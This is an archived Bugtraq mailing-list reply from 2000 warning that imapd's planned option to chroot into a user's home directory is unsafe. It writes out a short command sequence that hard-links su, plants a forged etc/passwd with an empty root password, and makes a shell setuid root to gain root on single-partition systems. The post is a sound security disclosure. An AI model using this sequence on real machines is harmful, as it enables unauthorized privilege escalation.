Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: response to the bugtraq report of buffer overruns in imapd LIST command

From: elric () MABELODE IMRRYR ORG (R. C. Dowdeswell)
Date: Mon, 17 Apr 2000 23:02:48 -0700

On 956021099 seconds since the Beginning of the UNIX epoch
Mark Crispin wrote:


The final form of the CHROOT_SERVER code, which will be an option in the next
distributed version, consists of:
 if (chroot (home ? home : ANONYMOUSHOME)) return NIL;
 home = "/";
And, yes, this will do the necessary chdir().


chroot(2)'ing to a users home directory is rather a bad idea in a lot of
setups.  For example, assume that the machine has one large disk and one
partition.  Then for a decent number of unices would be vulnerable (on a
shell enabled machine) to:

$ cd
$ mkdir etc
$ ln /usr/bin/su
$ cp /bin/sh .
$ cat root::... > etc/passwd

imap in, get into a chroot(2) jail ain your home dir, get a shell, su.
Then

 # chmod 4755 sh

Using chroot in a lot of situations is rather dangerous, and one
must carefully set up the environment that it runs in.

IIRC, the default install of some unices/linuces is to have only one
partition.

 == Roland Dowdeswell                      http://www.Imrryr.ORG/~elric/  ==
 == The Unofficial NetBSD Web Pages        http://www.Imrryr.ORG/NetBSD/  ==
 == The NetBSD Project                            http://www.NetBSD.ORG/  ==
Previous By Date Next
Previous By Thread Next

Current thread: